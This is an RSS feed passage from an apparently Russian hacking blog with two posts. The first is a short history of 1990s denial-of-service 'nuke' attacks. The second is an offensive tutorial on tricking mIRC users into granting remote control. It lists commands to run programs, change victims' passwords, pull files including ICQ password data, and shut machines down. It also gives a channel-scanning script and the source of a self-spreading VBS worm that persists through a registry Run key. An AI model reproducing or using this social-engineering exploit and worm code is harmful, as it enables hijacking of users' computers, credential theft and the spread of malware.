		<guid isPermaLink="false">http://suspended.ru/?p=562</guid>
		<description><![CDATA[конецформыначалоформыСловом Nuke (ньюк) называют сегодня любую атаку на порты удаленных компьютеров, приводящую к краху операционной системы или разрыву интернет-соединения. Nuke не нарушает состояние файловой системы и не рушит &#171;железо&#187; компьютера. Перезагрузившись, пользователь может продолжить работу в Сети. Все началось с атаки, исходный код которой на языке С назывался nuke.c. Атака не получила широкого распространения, так [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet261.jpg" alt="интернет" />конецформыначалоформыСловом Nuke (ньюк) называют сегодня любую атаку на порты удаленных компьютеров, приводящую к краху операционной системы или разрыву интернет-соединения. Nuke не нарушает состояние файловой системы и не рушит &#171;железо&#187; компьютера. Перезагрузившись, пользователь может продолжить работу в Сети. Все началось с атаки, исходный код которой на языке С назывался nuke.c. Атака не получила широкого распространения, так как могла работать только на UNIX системах с правами root. Идея nuke.c заключалась в том, что она отсылала неправильные (invalid) ICMP пакеты, и машина-хост теряла связь.<br />
В январе 1997 появилась атака под названием Ping o&#8217; Death, и 18 распространенных операционныхсистем оказались к ней весьма чувствительны.<span id="more-562"></span> Ping o&#8217; Death основана на отсылке более 65 507 байтов данных. Так как большинство систем не собирают все пакеты до того, как получат их полностью, то при определенных ухищрениях можно добиться эффектного результата &#8212; полученные данные просто не уместятся в 16-битной внутренней переменной, возникает неустранимая ошибка и рушится операционная система. Но, пожалуй, первой широко известной атакой стала Out Of Band (WinNuke).<br />
7 июня 1997 г. некто по имени &#171;_eci&#187; впервые опубликовал в Сети исходный код реализующей ее программы.<br />
В течение 15 дней, что специалисты из Мicrosoft устраняли эту дыру, в Интернете росла эпидемия синих экранов. Не угасла она и до сих пор, поскольку далеко не каждый пользователь удосужился &#171;залатать дыры&#187; своей операционки. Атака Out Of Band (OOB) основана на том, что 139 порт Win95 (135 порт WinNT) не закрыт для постороннего вторжения, поэтому, отослав на этот порт пакет данных с флагом заголовка OOB, можно спровоцировать зависание операционной системы и появление синего экрана. Не успели утихнуть разговоры по поводу OOB, как появилась новая напасть под названием Ssping (Jolt). При этой атаке в адрес хоста отсылаются поддельные TCP/IP пакеты, что приводит к замедлению работы или разрыву связи. Эта атака не была столь летальной, как OOB, но тоже смогла доставить немало неприятностей.<br />
В начале июля 1997 года на арену вышла Fragmentation Attack (Teardrop), основанная на отсылке IP пакетов заведомо неправильной длины. Атакованный компьютер не может соединить эти пакеты и зависает.<br />
В начале декабря 1997 года появилась атака под названием Land. Методы воздействия схожи с методами SSPing за одним маленьким исключением &#8212; программные заплатки, справлявшиеся с SSPing, оказались бессильны.<br />
Январь 1998 года. Bonk и Bonik &#8212; модификации TearDrop, основанные на несформированной UDP информации заголовков IP пакетов. Уже к третьей декаде месяца Microsoft выпустила защищающие от этой атаки дополнения, но многие входящие в &#171;группу риска&#187; пользователи так и не удосужились эту &#171;заплатку&#187; установить. Расплатой за небрежность стала ночь со 2 на 3 марта 1998 года, когда неизвестный злоумышленник вывел из строя тысячи Windows-машин в США именно этой атакой. Среди пострадавших оказались NASA и Массачусетский технологический университет.<br />
Часто атаки комбинируются. Например, Land &#038; IP Spoofing: нападающая сторона многократно провоцирует сервер на обмен сообщениями, но в качестве обратного адреса указывает вымышленный. Таким образом, возникают полуоткрытые соединения (half-open connections), при определенном количестве которых сервер просто не в состоянии открывать новые. В большинстве случаев сервер-жертва ощутимо замедляет свою работу, хотя может возникнуть аварийная перезагрузка памяти. (Spoofing &#8212; подмена реального адреса отправителя вымышленным. Как правило, используется в сочетании с разными видами атак, чтобы жертва не смогла определить адрес нападавшего.)</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-254/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Уязвимость мирк скриптов и как её юзать</title>
		<link>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-255/</link>
		<comments>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-255/#comments</comments>
		<pubDate>Thu, 13 May 2010 05:05:30 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Хакерство]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[обман]]></category>
		<category><![CDATA[пароли]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=563</guid>
		<description><![CDATA[Для начала надо расказать о самой уязвимости =)) Нет лёгких методов взлома, но взлом irc будет достаточно прост если вам удастся выполнить миссию и заставить пользователя набрать нужную вам команду. Команда: //write St1m.log ctcp 1:*:?:$1- &#124; Load -rs St1m.log Что делает ета простая команда?! Всё очень легко =)) //write St1m.log ctcp 1:*:?:$1- = записывает в [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet262.jpg" alt="интернет" /> Для начала надо расказать о самой уязвимости =))<br />
Нет лёгких методов взлома, но взлом irc будет достаточно прост если вам удастся выполнить миссию и заставить пользователя набрать нужную вам команду.<br />
Команда: //write St1m.log ctcp 1:*:?:$1- | Load -rs St1m.log<br />
Что делает ета простая команда?!<br />
Всё очень легко =))<br />
//write St1m.log ctcp 1:*:?:$1- = записывает в корень irc файл под названием St1m.log в котором содержится ctcp 1:*:?:$1-<br />
Собсно рассомтрим ctcp 1:*:?:$1- слово ctcp говорит о том что ето маска на ctcp команды цифра 1 означает что пользователь с уровнем 1 (тоесть все =)) может посылать вам ctcp запросы. Далее идём маска :*:?: которая разрешает все запросы и в самом конце идентификатор $1- который возвращает все ващи команды.<span id="more-563"></span><br />
Так что вам надо всеголишь заставить пользователя ввести данную строку в своём мирке после чего он создаст для себя уязвимость.<br />
Вот некоторые команды:<br />
Сделать чтоб юзер зашёл на канал: /ctcp NICK /j #CHANNEL<br />
Юзер покидает канал: /ctcp NICK /part #CHANNEL<br />
Послать сообщение от имени жертвы: /ctcp NICK /msg #CHANNEL OUR MESSAGE&#8230;<br />
Послать приватное сообщение от имени жертвы: /ctcp NICK /msg NICK(anyone) OUR MESSAGE&#8230;<br />
Закрыть mirc жертвы: /ctcp NICK /exit<br />
Сменить жертве пароль: /ctcp NICK /msg nickserv set passwd NEW_PASS<br />
Сменить жертве ник: /ctcp NICK /nick NeW_NicK<br />
Если жертва является опом то следующей командой вы заставляете её дать вам опа на канале: /ctcp NICK /mode #channel +o OUR_NICK<br />
Выполнить на компьютере жертвы команду MS-DOS: /ctcp NICK /run command<br />
Открыть mirc на компьютере жертвы: /ctcp NICK /run mirc<br />
Запустить редактор реестра на компе жертвы: /ctcp NICK /run regedit<br />
Флуд на компе жертвы: /ctcp NICK /timer1 0 0 /ping $me<br />
Вырубить винду на компе жертвы: /ctcp NICK /run exitwindows<br />
такмс&#8230;<br />
Уже нетерпиться попробовать ето все на практике, но какже посмотреть на мирк сервере есть ли уже люди которые ввели ету строчку???<br />
Скрипт скана мирк серверов<br />
#SCAN<br />
alias mass {<br />
set %i 1<br />
var %massmsgmsg Yes<br />
set %nickme $me<br />
:next<br />
set %nick $nick(#,%i)<br />
if (%nick == $null) goto done<br />
if (%nick != $me) { /ctcp %nick /msg %nickme %massmsgmsg }<br />
inc %i<br />
goto next<br />
:done<br />
}</p>
<p>Я думаю тут все понятно и без обьяснений =))<br />
Так&#8230; теперь мы можем найти пользователя на канале с уязвимостью и сможем пошутить над ним, но какже быть с более серьёзными атаками<br />
Минус в том что ети команды не обрабатывают идентификаторы, но зачемже тогда команда /write =)))<br />
так вот пример атаки и сбора сведений о компьютере жертвы<br />
___________________________________________________________________________<br />
&#8212;- > Узнаю в какой директории лежит Мирк .exe<br />
[06:59:12] -> [[SF]Norfolk] /WRITE fool.txt /notice Кевин_Митник $mircdir<br />
[06:59:56] -> [[SF]Norfolk] /PLAY -c #hack fool.txt<br />
[06:59:58] -[SF]Norfolk- D:Мирка<br />
&#8212;- > Узнаю на каком диске находится WINDOWS<br />
[07:02:21] -> [[SF]Norfolk] /WRITE fool.vbs set FSO = createobject(&#171;scripting.filesystemObject&#187;)<br />
[07:02:33] -> [[SF]Norfolk] /WRITE fool.vbs set dirwin = fso.getspecialfolder(0)<br />
[07:02:46] -> [[SF]Norfolk] /WRITE fool.vbs set text = fso.createtextfile(&#171;fool.txt&#187;)<br />
[07:02:59] -> [[SF]Norfolk] /WRITE fool.vbs text.writeline &#171;/notice Кевин_Митник&#187; &#038; &#187; &#187; &#038; dirwin<br />
[07:03:09] -> [[SF]Norfolk] /WRITE fool.vbs text.close<br />
[07:03:36] -> [[SF]Norfolk] /PLAY -c #hack fool.txt<br />
[07:03:38] -[SF]Norfolk- C:WINDOWS<br />
&#8212;- > Очищаю документы<br />
[07:05:36] -> [[SF]Norfolk] /WRITE -c fool.txt<br />
[07:05:39] -> [[SF]Norfolk] /WRITE -c fool.vbs<br />
____________________________________________________________________________<br />
Как вы уже поняли можно записывать файлы на компьютер жертвы и потом проигрывать их для определённого канала.<br />
ВНИМАНИЕ: Жертва видит что отсылает вам нотисы, так что советую использовать ето когда мирк жертвы свёрнут в трей или жертвы нет у компьютера. И не забывайте чистить файлы а лучше удалять их с компьютера жертвы.<br />
Лучше всего выключать компьютер жертве командой /ctcp NICK /RUN shutdown.exe -s -f -t 00<br />
Вот некоторые идентификаторы которые помогут тебе собрать нужную информацию<br />
OS &#8212; $os<br />
Host &#8212; $host<br />
email &#8212; $emailaddr<br />
Название лога который лежит в папке под номером 100 &#8212; $findfile($mircdirlogs,*.*,100)<br />
$disk(C:) &#8212; C: если диск существует то вам веррнется $true<br />
$disk(D:) &#8212; D:<br />
$disk(E:) &#8212; E:<br />
mirc folder &#8212; $mircdir<br />
Следующий пример неработает в некоторых irc серверах<br />
Вы должны заставить жертву набрать следующее:<br />
/fserve OUR_NICK 4 c:<br />
После этого диск C: компьютера жертвы будет открыт для вас. И вы сможете делать следующее:<br />
Команды:<br />
cd : С помощью этой команды вы можете перейти в любую папку.<br />
Например: cd windows (попадёте в папку windows)<br />
dir : Команда как в MS-DOS<br />
get : Важная команда! Вы можете получить любые файлы с компьютера жертвы. Жертва видит передачу файлов, но если получать маленькие по обьёму файлы то передача будет очень быстрой и жертва может просто не заметить этого.<br />
read: Чтение текстовых файлов.<br />
Вы можете получить пароль от ICQ жертвы. Используя команду get получаете файл .dat и можете получить пароль от ICQ.<br />
Дальше больше.<br />
Попробуем написать вирус который будет рассылать себя по мирку и заражать траянчегом их<br />
set FSO = createobject(&#171;scripting.filesystemObject&#187;)<br />
set scriptini = fso.CreateTextFile(&#171;C:Program Filesscript.ini&#187;)<br />
set virus = FSO.getfile(wscript.scriptfullname)<br />
Set S = CreateObject(&#171;Wscript.Shell&#187;)<br />
mircfile = &#171;&#187;&#038;&#187;St1m.jpg .vbs&#187;<br />
virus.copy(dirsystem&#038;mircfile)<br />
mircoff = dirsystem&#038;mircfile<br />
S.regwrite &#171;HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServicesKernel32&#8243;, mircoff<br />
scriptini.WriteLine &#171;[script]&#187;<br />
scriptini.WriteLine &#171;n0= on 1:JOIN:#:{&#187;<br />
scriptini.WriteLine &#171;n1= if ( $nick == $me ) { halt }&#187;<br />
scriptini.WriteLine &#171;n2= /dcc send $nick&#187; &#038;&#187; &#171;&#038;mircoff<br />
scriptini.WriteLine &#171;n3= on 1:JOIN:#:{ &#187;<br />
scriptini.WriteLine &#171;n4 /write St1m.st ctcp 1:*:?:$1- | Load -rs St1m.st &#187;<br />
scriptini.WriteLine &#171;n5 }&#187;<br />
set f = fso.GetFolder(&#171;C:Program Files&#187;)<br />
set sf = f.SubFolders<br />
for each f1 in sf<br />
set viruss = FSO.getfile(&#171;C:Program Filesscript.ini&#187;)<br />
file1 =&#187;&#187;&#038;&#187;script.ini&#187;<br />
viruss.copy(f1&#038;file1)<br />
next<br />
Если мирк находится или будет находиться в Program Files то етот скрипт его обезательно заразит и начнёт сам себя рассылать всем кто присоединяется к каналам на которых сидит жертва. Даже если жертва удалит мирк и переустановит её то после перезагрузки новый мирк опять заразится.</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-255/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
